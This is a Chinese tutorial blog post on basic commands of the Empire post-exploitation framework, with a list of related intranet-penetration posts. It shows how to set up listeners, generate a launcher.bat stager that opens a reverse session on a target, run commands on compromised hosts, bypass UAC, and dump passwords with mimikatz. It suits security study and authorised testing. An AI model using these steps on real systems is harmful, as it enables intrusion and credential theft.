1. 程式人生 > >內網滲透 day14-empire基礎命令的使用

內網滲透 day14-empire基礎命令的使用

empire的基礎操作

目錄

1. 建立監聽器

2. 設定stagers

3. 使用者互動

4. 提權

1. 建立監聽器

help    檢視幫助命令

listeners     檢視監聽器

uselistener  xxx     使用監聽器模組

常用的監聽模組:http

按兩次tab鍵檢視能使用的監聽器模組

info    檢視引數資訊

設定引數

set Name xxx

set Host http://xxx

set Port xxx

執行:execute

main 返回主選單

這邊顯示目前有一個活躍的監聽器

2. 設定stagers

usestagers xxx   使用stager模組

常用的模組:windows/hta、windows/launcher_bat

按兩次tab鍵檢視能使用的stager模組

info  檢視要設定的引數

set Listener xx     設定監聽器

set OutFile /var/www/html/launcher.bat 設定檔案生成路勁

delete   木馬執行完是否自動刪除

Obfuscate(混淆)

execute 執行

在靶機上雙擊bat檔案成功反彈會話

3. 使用者互動

agents 切換到使用者列表

list 列出使用者

rename 修改使用者ID的名字

interact 進入到使用者互動介面

sysinfo     檢視系統資訊

sc  截圖

searchmodule 搜尋模組

shell + command 執行命令

spawn 遷移到新的使用者需要指定監聽器的名字

產生了一個新的會話

使用者清除:

kill agents | all

監聽器清除:

kill listener | all

4. 提權

bypassuac  <listener>      bypassuac繞過uac提權

可以看到產生了一個帶*的會話,提權成功使用者名稱前面會多一個*號

mimikatz      在擁有許可權後可以利用mimikatz獲取使用者賬號密碼

creds         以列表的形式顯示mimikatz獲取的賬號密碼

uac提權(需要手動確認)

searchmodule ask 搜尋ask模組

usemodule privesc/ask       使用privesc/ask模組

info    檢視所需引數

設定監聽器

run   執行

靶機彈出uac認證框

列表中產生新的管理員會話

相關推薦

滲透 day14-empire基礎命令的使用

empire的基礎操作目錄1. 建立監聽器 2. 設定stagers 3. 使用者互動 4. 提權 1. 建立監聽器help    檢視幫助命令 listeners     檢視監聽器 uselistener  xxx 

滲透一些命令收集整理

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

滲透基礎、域、工作組、域控概念介紹

一、什麼是內網 區域網(Local Area Network, LAN),又稱內網,是指在某一區域內由多臺計算機互聯成的計算機組。 區域網可以實現檔案管理、應用軟體共享、印表機共享、掃描器共享、工作組內的日程安排、電子郵件和傳真通訊服務等功能。區域網嚴格意

Ettercap滲透

con true post har target htm 查看連接 tlist host 最近網速很卡,於是想到有人在蹭網,怎麽捉弄一下呢? 1、開啟ettercap ettercap -G 2、 Hosts->Scan,List 發現有幾個新的地址192.16

滲透常見隧道技術(原)

內網滲透中隧道滲透技術(原)   埠轉發、埠對映、socks代理工具(msf的portfwd、socks4a和windows下的lcx.exe)的使用做一個記錄筆記   場景應用 埠轉發:用於目標機器對某埠進出進行了限制 埠對映:用於目標機器內網環境無法外網進行3389連線

史上最強滲透知識點總結

獲取 webshell 進內網 測試主站,搜 wooyun 歷史洞未發現歷史洞,github, svn, 目錄掃描未發現敏感資訊, 無域傳送,埠只開了80埠,找到後臺地址,想爆破後臺,驗證碼後臺驗證,一次性,用 ocr 識別,找賬號,通過 google

滲透之reGeorg+Proxifier

0x00 前言 遇到內網環境,防火牆DMZ區域對映外網埠80,使用常規lcx等反彈工具也會被各種安全軟體攔截,嘗試各自提權無果,這個時候就需要一款內網代理和埠轉發工具,穿越防火牆的阻擋直連內網。 0x01 正向代理和反向代理      簡單區分一下正向代理和反向代理

滲透 關於GPO

  網上有很多講內網滲透的文章,但看來看去還是一老外的部落格給力,部落格地址:www.harmj0y.net/blog,看完就明白這裡面的很多思路都非常好。   做內網時,有時會碰到目標的機器開防火牆,所有埠基本都訪問不到,這種就比較難辦了。就自己知道的方法只能靠GPO了(Group Policy Objec

滲透測試的藝術[一]資訊收集(入門篇)

資訊收集[入門篇] 利用系統現有工具在現有許可權條件下,我們到底能做些什麼務必要時刻謹記我們蒐集資訊的初衷(嚴謹盲目),我們所蒐集到的每個資訊,都應該有它存在的價值,也就是說後續我們到底可以拿它幹什麼?這無比重要,舉個簡單例子,就拿蒐集密碼來說,首先我要知道哪些

滲透bypassuac和smb溢位

對內網滲透需要滲透的目標主機處於跨網段和uac限制的情況做一個滲透記錄   環境大致如下 擁有shell許可權的win7(有uac限制,處於雙網段) 和同win7同一網段下暫時無許可權的靶機xp   先對有許可權的win7進行hashdump    

滲透實戰(一)

本次測試為實戰,測試環境為朋友的個人商業網站,伺服器位於某資料中心,所提漏洞已通知並協助修復 首先借助該網站某處上傳漏洞,實現一句話木馬上傳,然後使用菜刀連線。  

一次小小的滲透實戰(無後滲透階段)

時隔這麼久,讀書也讀了,考試也考完了。開始接受別人給我一次實戰的任務。--記一次學習不久的實戰,以後看到可能會笑自己輕噴有問題可以留言給我。謝謝這次選在了離我家比較近的網咖。每次上網完回家身上都是一股煙味,點比較煩。所以才會想來這裡。讓我們開始吧1、滲透環境配置需要材料有: 

滲透思路整理與工具使用

前言上個學期一直在學審計,前幾天ST2漏洞大火,隨便打一個就是root許可權,我卻拿著root許可權不知如何繼續進行。因為這個,發現了自己對滲透知識的缺失,因此用了兩週左右的時間學習補充了一下內網滲透的知識,看了不少大牛的文章,膜拜之餘還是做了一些筆記的。到滲透入門結束之餘,

(二)滲透之tomcat中介軟體漏洞

使用埠掃描、漏洞掃描驗證掃描目標開放的埠,在對應埠上開放的服務,執行該服務的軟體和版本號。 如果只是使用埠掃描,只是發現開放的埠,接著使用 nc 、nmap可以獲取埠上服務的 banner 資訊,獲取 banner 資訊後需要在漏洞庫上查詢對應 CVE,後面就是驗證漏洞是否存在。如果是使用漏洞掃描工

(一)滲透之資訊收集

內網滲透之資訊收集篇-----參考先知白河愁作品,進行新增修改,轉載請註明出處。 一 主機掃描 (1)使用埠掃描工具可以實現主機發現的功能。以下引數可加快掃描程序。特意提的事nmap如何加快掃描進度。 –min-hostgroup 1024(調整並行掃描組的大小,最小分組設定為10

[原創]K8飛刀20150725 支援SOCKS5代理(滲透)

工具: K8飛刀編譯: 自己查殼組織: K8搞基大隊[K8team]作者: K8拉登哥哥部落格: http://qqhack8.blog.163.com釋出: 2015/7/26 3:41:11簡介: K8飛刀是一款多功能的滲透測試工具. Hacke

從零開始滲透學習

檸檬的內網合集,第二次看,感覺就不一樣了。。。 雖然我們同屆,但感覺相差甚遠啊,努力努力。 Team:Syclover Author:L3m0n Email:[email protected] [TOC] ###域環境搭建 準備: DC: win2008

滲透之如何玩轉Meterpreter?

隨著windows系統的不斷更新完善,windows對使用者系統的安全力度也在加強。這對我們的滲透,也帶來了不少的麻煩。今天我將帶大家,利用目前流行的 metasploit 框架,繞過一些 UAC 及防火牆的限制,從而達到成功利用的目的! 由於繞過 UAC 的功能需在

n2n穿透神器(一條命令實現穿透)(linux,安卓,win,openwrt全介紹)

n2n簡介: 百度百科:N2N,內衣服飾品牌於上世紀九十年代在美國誕生,經歷逾二十幾年的不斷拓展,現發展成為龐大的跨國內衣服飾品牌,其連鎖專賣店網路遍佈全球100多個國家大、中城市,數目逾萬間,無論品

滲透—流量轉發

#### 0x00前言 在拿到一臺伺服器的shell的時候,如果想要更進一步滲透測試,則需要進行內網滲透 而內網滲透的第一步就是掛代理,首先需要明確一個概念,在日常生活中常用`vpn`掛代理去google查資料,自己搭過`vpn`的人都知道,要在買的`vps`上搭建`ss的伺服器端`,之後在`自己電腦`上